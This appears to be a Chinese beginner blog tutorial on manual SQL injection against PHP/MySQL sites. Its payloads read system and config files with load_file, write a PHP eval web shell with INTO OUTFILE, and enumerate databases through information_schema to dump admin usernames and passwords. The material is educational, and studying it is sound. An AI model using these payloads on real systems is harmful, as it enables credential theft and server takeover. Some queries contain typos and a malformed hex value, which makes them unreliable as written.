网络安全实验室网络与信息安全从0到1玩转网络安全

从0到1学习网络安全 【Web安全入门篇-SQL注入】

2018-03-16  本文已影响257人  _07

前言

上一章我们已经学习了如何搭建环境,接下来我们将以 PHP + MySQL 环境为例一起学习SQL注入。

简介

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

原理

针对 SQL 注入的攻击行为可描述为通过用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击行为。
其成因可以归结以下两个原因叠加造成的:
1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造 SQL 语句
2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到 SQL 语句中。

注入危害

攻击者利用 SQL 注入漏洞,可以获取数据库中的多种信息(例如:管理员后台密码),从而脱取数据库中内容(脱库)。在特别情况下,还可以修改数据库内容或者插入内容到数据库,如果数据库权限分配存在问题,或者数据库本身存在缺陷,那么攻击者可以通过 SQL 注入漏洞直接获取 webshell 或者服务器系统权限。

注入分类
  1. 根据数据类型
  1. 根据注入语法
SQL 注入挖掘
MySQL 中常用函数
MySQL 中 information_scheme 库
load_file( )函数 读文件操作

前提:

UNION SELECT 1,load_file('/etc/passwd'),3,4,5,6#
UNION SELECT 1,load_file('D://phpStudy//WWW//conn.php'),3,4,5,6
UNION SELECT 1,load_file(0x443A2F2F70687053747564792F2F5757572F2F636F6E6E2E706870),3,4,5,6
into outfile( )写文件操作

前提:

SELECT '<?php eval($_POST[1]); ?>' into outfile ' D://phpStudy//WWW//hack.php '
MySQL 中 UNION 规则


对以上知识有所了解之后我们就可以学习一些在SQL注入时常用的一些操作
  1. 判断字段数

挖掘出注入点之后我们可以通过 order by 来判断表的字段数
例如: www.xxx.com/test.php?id=6 order by n

注:通常使用“order by N”,通过不断变换N的值,至刚好返回正常的网页,可得到当前表的字段数

  1. 判断显示位

www.xxx.com/test.php?id=6 union select 1,2,3,4,5,6

  1. 获取当数据库名称和当前连接数据库的用户

www.xxx.com/test.php?id=-1 union select 1,2,databaes(),4,5,6
www.xxx.com/test.php?id=-1 union select 1,2,user(),4,5,6

  1. 列出所有数据库

limit 一个一个打印出来库名
select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1
group_concat 一次性全部显示
select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA

  1. 列出(数据库:xss)中所有的表

limit 一个一个打印出来字段名 schema
select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA='xss' limit 0,1
group_concat 一次性全部显示
select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374
注意:数据库名称可以用十六进制来代替字符串,这样可以绕过单引号的限制。

  1. 列出(数据库:xss 表:admins )中所有的字段

limit 一个一个打印出来
select COLIMN_NAME from information_schema.COLUMNS where TABLE_SCHEMA='xss' and
TABLENAME='admins ' limit 0,1
group_concat 一次性全部显示
select group_concat(COLUMN_NAME) from information_schema.COLUMNS where
TABLE_SCHEMA=0x74657374 and TABLE_NAME=0x61646d696e

  1. 列出(数据库:xss 表:admins )中的数据

limit 一个一个打印出来
select username,passwd from xss.admins limit 0,1
group_concat 把 一次性全部打印
select group_concat(concat(username,0x20,passwd)) from xss.admins


本章是手工注入的一些技巧,当然在实际操作中我们很少会用手工来进行注入测试,所以下一篇我将给大家介绍一款比较常用的注入工具。

从0到1学习网络安全 【目录】

小编最近建了交流群方便大家交流学习,群内有小编平时整理的学习资料、视频、工具等。
白帽交流群 【简介】
感谢大家支持。

上一篇下一篇

猜你喜欢

热点阅读